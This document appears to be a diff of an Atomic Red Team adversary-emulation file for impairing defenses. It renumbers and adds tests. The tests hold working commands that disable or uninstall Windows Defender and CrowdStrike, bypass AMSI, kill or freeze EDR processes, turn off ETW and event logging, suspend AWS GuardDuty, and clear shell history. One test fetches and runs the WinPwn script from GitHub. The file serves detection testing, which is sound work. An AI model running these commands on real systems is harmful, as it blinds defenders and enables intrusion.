 if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
 ```
 
-### Atomic Test #23: Tamper with Windows Defender Evade Scanning -Folder
+### Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder
 
 Malware can exclude a specific path from being scanned and evading detection. 
 Upon successul execution, the file provided should be on the list of excluded path. 
@@ -735,7 +818,7 @@ Add-MpPreference -ExclusionPath $excludedpath
 $excludedpath= "#{excluded_folder}"
 Remove-MpPreference -ExclusionPath $excludedpath
 ```
-### Atomic Test #24: Tamper with Windows Defender Evade Scanning -Extension
+### Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension
 
 Malware can exclude specific extensions from being scanned and evading detection. 
 Upon successful execution, the extension(s) should be on the list of excluded extensions.
@@ -764,7 +847,7 @@ Add-MpPreference -ExclusionExtension  $excludedExts
 $excludedExts= "#{excluded_exts}"
 Remove-MpPreference -ExclusionExtension  $excludedExts -ErrorAction Ignore
 ```
-### Atomic Test #25: Tamper with Windows Defender Evade Scanning -Process
+### Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process
 
 Malware can exclude specific processes from being scanned and evading detection.
 Upon successful execution, the process(es) should be on the list of excluded processes. 
@@ -793,7 +876,7 @@ Add-MpPreference -ExclusionProcess $excludedProcess
 $excludedProcess = "#{excluded_process}"
 Remove-MpPreference -ExclusionProcess  $excludedProcess
 ```
-### Atomic Test #26: office-365-Disable-AntiPhishRule
+### Atomic Test #29: office-365-Disable-AntiPhishRule
 
 Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.
 
@@ -851,7 +934,7 @@ Install-Module -Name ExchangeOnlineManagement
 Import-Module ExchangeOnlineManagement
 ```
 
-### Atomic Test #27: Disable Windows Defender with DISM
+### Atomic Test #30: Disable Windows Defender with DISM
 
 The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool. 
 DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
@@ -868,7 +951,7 @@ This method will remove Defender and it's package.
 Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
 ```
 
-### Atomic Test #28: Disable Defender Using NirSoft AdvancedRun
+### Atomic Test #31: Disable Defender Using NirSoft AdvancedRun
 
 Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
 This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
@@ -920,7 +1003,7 @@ Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathT
 Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force
 ```
 
-### Atomic Test #29: Kill antimalware protected processes using Backstab
+### Atomic Test #32: Kill antimalware protected processes using Backstab
 
 Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.
 https://github.com/Yaxser/Backstab
@@ -959,7 +1042,7 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction
 Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe"
 ```
 
-### Atomic Test #30: WinPwn - Kill the event log services for stealth
+### Atomic Test #33: WinPwn - Kill the event log services for stealth
 
 Kill the event log services for stealth via function of WinPwn
 
@@ -974,7 +1057,7 @@ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/
 inv-phantom -consoleoutput -noninteractive
 ```
 
-### Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell
+### Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell
 
 Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
 in Windows settings.
@@ -1000,7 +1083,7 @@ Set-MpPreference -dbm 0
 Set-MpPreference -dscrptsc 0
 Set-MpPreference -dbaf 0
 ```
-### Atomic Test #32: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
+### Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
 
 LockBit Black - Disable Privacy Settings Experience Using Registry
 
@@ -1019,7 +1102,7 @@ reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperie
 ```cmd
 reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1
 ```
-### Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd
+### Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd
 
 LockBit Black - Use Registry Editor to turn on automatic logon
 
@@ -1044,7 +1127,7 @@ reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon"
 reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
 reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1
 ```
-### Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
+### Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
 
 LockBit Black - Disable Privacy Settings Experience Using Registry
 
@@ -1063,7 +1146,7 @@ New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisableP
 ```powershell
 Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -Force -ErrorAction Ignore
 ```
-### Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
+### Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
 
 Lockbit Black - Use Registry Editor to turn on automatic logon
 
@@ -1088,7 +1171,7 @@ Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion
 Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
 Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
 ```
-### Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
+### Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
 
 The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. 
 Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
@@ -1109,7 +1192,7 @@ Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestar
 Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
 ```
 
-### Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder
+### Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder
 
 The following Atomic will attempt to exclude a folder within Defender leveraging WMI
 Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
@@ -1129,7 +1212,7 @@ wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference ca
 ```cmd
 wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
 ```
-### Atomic Test #38: Delete Windows Defender Scheduled Tasks
+### Atomic Test #41: Delete Windows Defender Scheduled Tasks
 
 The following atomic test will delete the Windows Defender scheduled tasks.
 
@@ -1176,7 +1259,7 @@ schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender V
 schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml"
 ```
 
-### Atomic Test #39: Clear History
+### Atomic Test #42: Clear History
 
 Clear Shell History. This technique only affect the bash shell application.
 
@@ -1190,7 +1273,7 @@ Clear Shell History. This technique only affect the bash shell application.
 history -c
 ```
 
-### Atomic Test #40: Suspend History
+### Atomic Test #43: Suspend History
 
 suspend Shell History seen in Awfulshred wiper- https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell
 
@@ -1209,7 +1292,7 @@ set +o history
 ```sh
 set -o history
 ```
-### Atomic Test #41: Reboot Linux Host via Kernel System Request
+### Atomic Test #44: Reboot Linux Host via Kernel System Request
 
 reboot system via system request seen in Awfulshred wiper.
 
@@ -1224,7 +1307,7 @@ echo 1> /proc/sys/kernel/sysrq
 echo b> /proc/sysrq-trigger
 ```
 
-### Atomic Test #42: Clear Pagging Cache
+### Atomic Test #45: Clear Pagging Cache
 
 clear pagging cache via system request. This is a temporary change in the system to clear paging cache. This technique seen in Awfulshred wiper as part
 of its malicious payload on the compromised host. added reference link for this technique: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/
@@ -1240,7 +1323,7 @@ free && echo 3 > /proc/sys/vm/drop_caches && free
 echo 3> /proc/sys/vm/drop_caches
 ```
 
-### Atomic Test #43: Disable Memory Swap
+### Atomic Test #46: Disable Memory Swap
 
 disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional 
 payload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.
@@ -1265,7 +1348,7 @@ swapon -a
 sleep 2
 sync
 ```
-### Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI)
+### Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)
 
 This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
 The pre-req needs to be ran in order to setup HVCI and have it enabled. 
@@ -1313,7 +1396,7 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorE
 reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
 ```
 
-### Atomic Test #45: AMSI Bypass - Override AMSI via COM
+### Atomic Test #48: AMSI Bypass - Override AMSI via COM
 
 With administrative rights, an adversary can disable AMSI via registry value in HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that does not exist.
 This is currently being used by AsyncRAT and others. 
@@ -1335,7 +1418,7 @@ REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InPro
 ```cmd
 REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /f
 ```
-### Atomic Test #46: AWS - GuardDuty Suspension or Deletion
+### Atomic Test #49: AWS - GuardDuty Suspension or Deletion
 
 Enables GuardDuty in AWS, upon successful creation this test will suspend and then delete the GuardDuty configuration.
 
@@ -1379,7 +1462,7 @@ cat ~/.aws/credentials | grep "default"
 echo "Please install the aws-cli and configure your AWS default profile using: aws configure"
 ```
 
-### Atomic Test #47: Tamper with Defender ATP on Linux/MacOS
+### Atomic Test #50x: Tamper with Defender ATP on Linux/MacOS
 
 With root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
 
@@ -1398,7 +1481,7 @@ sudo mdatp config real-time-protection --value disabled
 ```sh
 sudo mdatp config real-time-protection --value enabled
 ```
-### Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe
+### Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe
 
 Disable Windows Defender by tampering with windows defender registry using the utility "reg.exe"
 
@@ -1451,7 +1534,7 @@ reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection
 reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "1" /f >NUL 2>nul
 reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
 ```
-### Atomic Test #49: Tamper with Windows Defender Registry - Powershell
+### Atomic Test #52: Tamper with Windows Defender Registry - Powershell
 
 Disable Windows Defender by tampering with windows defender registry through powershell
 
@@ -1504,7 +1587,7 @@ Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "Tam
 Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 1 
 Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 1
 ```
-### Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI
+### Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI
 
 An adversary may disable account lockout policy within ESXi to have the ability to prevent defensive actions from being enforced in the future or to prevent future alerting.
 
@@ -1547,7 +1630,7 @@ if (-not $RequiredModule) {exit 1}
 Install-Module -Name VMware.PowerCLI -Confirm:$false
 ```
 
-### Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune
+### Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune
 
 This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates an InTune-based rules deployment.
 
@@ -1580,7 +1663,7 @@ Remove-ItemProperty -Path $registryPath -Name $registryValueName
 Write-Host "Registry value deleted: $registryValueName"
 ```
 
-### Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO
+### Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO
 
 This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates a GPO-based rules deployment.
 
@@ -1607,7 +1690,7 @@ Remove-ItemProperty -Path $registryPath -Name $newValueName
 Write-Host "Registry value deleted: $newValueName"
 ```
 
-### Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key
+### Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key
 
 Threat Actor could disable the AMSI function by adding a registry value name “AmsiEnable” to the registry key “HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable” and set its value to 0.
 Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
@@ -1628,7 +1711,7 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Name
 ```powershell
 Remove-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Recurse -Force 2> $null
 ```
-### Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
+### Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
 
 This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
 
@@ -1647,7 +1730,7 @@ reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Applicati
 ```cmd
 reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application" /v "Start" /t REG_DWORD /d "1" /f
 ```
-### Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
+### Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
 
 This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.
 
@@ -1666,7 +1749,7 @@ New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\Eve
 ```powershell
 New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application -Name Start -Value 1 -PropertyType "DWord" -Force
 ```
-### Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd
+### Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd
 
 This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
 
@@ -1691,7 +1774,7 @@ reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Applicati
 ```cmd
 reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" /v "Enabled" /t REG_DWORD /d "1" /f
 ```
-### Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell
+### Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell
 
 This atomic simulates an activity where an attacker disables a specific ETW provider from the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Enabled". This would effectivly remove that provider from the session and cause to not emit any logs of that type. The changes would only take effect after a restart.
 
@@ -1716,7 +1799,7 @@ New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\Ev
 ```powershell
 New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 1 -PropertyType "DWord" -Force
 ```
-### Atomic Test #58: Freeze PPL-protected process with EDR-Freeze
+### Atomic Test #61: Freeze PPL-protected process with EDR-Freeze
 
 This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
 
@@ -1882,7 +1965,7 @@ Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | O
 Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
 Write-Output "File deleted: $edrFreezeExe"
 ```
-### Atomic Test #59: Disable ASLR Via sysctl parameters - Linux
+### Atomic Test #62: Disable ASLR Via sysctl parameters - Linux
 
 Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux.
 
@@ -1901,3 +1984,378 @@ sysctl -w kernel.randomize_va_space=0
 ```bash
 sysctl -w kernel.randomize_va_space=2
 ```
+
+### Atomic Test #63: Auditing Configuration Changes on Linux Host
+
+Emulates modification of auditd configuration files
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `212cfbcf-4770-4980-bc21-303e37abd0e3`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf|
+| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf|
+| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf|
+
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
+
+```bash
+sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
+if [ -f "/etc/#{auditd_config_file_name}" ];
+then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
+else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
+fi 
+sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
+```
+
+#### Cleanup Commands
+
+```bash
+sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
+if [ -f "/etc/#{auditd_config_file_name}" ];
+then sed -i '$ d' /etc/#{auditd_config_file_name}
+else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
+fi
+sed -i '$ d' /etc/#{libaudit_config_file_name}
+```
+### Atomic Test #64: Auditing Configuration Changes on FreeBSD Host
+
+Emulates modification of auditd configuration files
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `cedaf7e7-28ee-42ab-ba13-456abd35d1bd`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event|
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+```sh
+echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
+```
+
+#### Cleanup Commands
+
+```sh
+sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
+```
+### Atomic Test #65: Logging Configuration Changes on Linux Host
+
+Emulates modification of syslog configuration.
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
+| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf|
+| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf|
+
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
+
+```bash
+if [ -f "/etc/#{syslog_config_file_name}" ];
+then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
+fi
+if [ -f "/etc/#{rsyslog_config_file_name}" ];
+then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
+fi
+if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
+then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
+fi
+```
+
+#### Cleanup Commands
+
+```bash
+if [ -f "/etc/#{syslog_config_file_name}" ];
+then sed -i '$ d' /etc/#{syslog_config_file_name}
+fi
+if [ -f "/etc/#{rsyslog_config_file_name}" ];
+then sed -i '$ d' /etc/#{rsyslog_config_file_name}
+fi
+if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
+then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
+fi
+```
+### Atomic Test #66: Logging Configuration Changes on FreeBSD Host
+
+Emulates modification of syslog configuration.
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `6b8ca3ab-5980-4321-80c3-bcd77c8daed8`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+```sh
+if [ -f "/etc/#{syslog_config_file_name}" ];
+then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
+fi
+```
+
+#### Cleanup Commands
+
+```sh
+if [ -f "/etc/#{syslog_config_file_name}" ];
+then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
+fi
+```
+### Atomic Test #67: Disable Powershell ETW Provider - Windows
+
+This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `6f118276-121d-4c09-bb58-a8fb4a72ee84`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;pstools&#92;PsExec.exe|
+| session | The session to disable. | string | EventLog-Application|
+| provider | The provider to disable. | string | Microsoft-Windows-Powershell|
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+```powershell
+cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
+```
+
+#### Cleanup Commands
+
+```powershell
+cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: PSExec must be installed on the machine.
+
+###### Check Prereq Commands
+
+```powershell
+if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
+```
+
+###### Get Prereq Commands
+
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
+expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
+```
+
+### Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)
+
+Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `8a4c33be-a0d3-434a-bee6-315405edbd5b`
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+```cmd
+REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
+```
+
+#### Cleanup Commands
+
+```cmd
+REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
+```
+### Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)
+
+Disables ETW for the .NET Framework using PowerShell to update the Windows registry
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `19c07a45-452d-4620-90ed-4c34fffbe758`
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+```powershell
+New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
+```
+
+#### Cleanup Commands
+
+```powershell
+REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
+```
+### Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
+
+An adversary can disable the ETW Provider of Windows Defender,
+so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `f6df0b8e-2c83-44c7-ba5e-0fa4386bec41`
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+```cmd
+reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands
+
+```cmd
+reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
+```
+### Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
+
+An adversary can disable the ETW Provider of Windows Defender,
+so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `69fc085b-5444-4879-8002-b24c8e1a3e02`
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+```powershell
+New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled  -PropertyType DWord -Value 0 -Force
+```
+
+#### Cleanup Commands
+
+```powershell
+Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
+```
+### Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
+
+Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `fdac1f79-b833-4bab-b4a1-11b1ed676a4b`
+
+#### Attack Commands: Run with `command_prompt`!
+
+```cmd
+REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
+```
+
+#### Cleanup Commands
+
+```cmd
+REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
+```
+### Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
+
+Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `b42c1f8c-399b-47ae-8fd8-763181395fee`
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
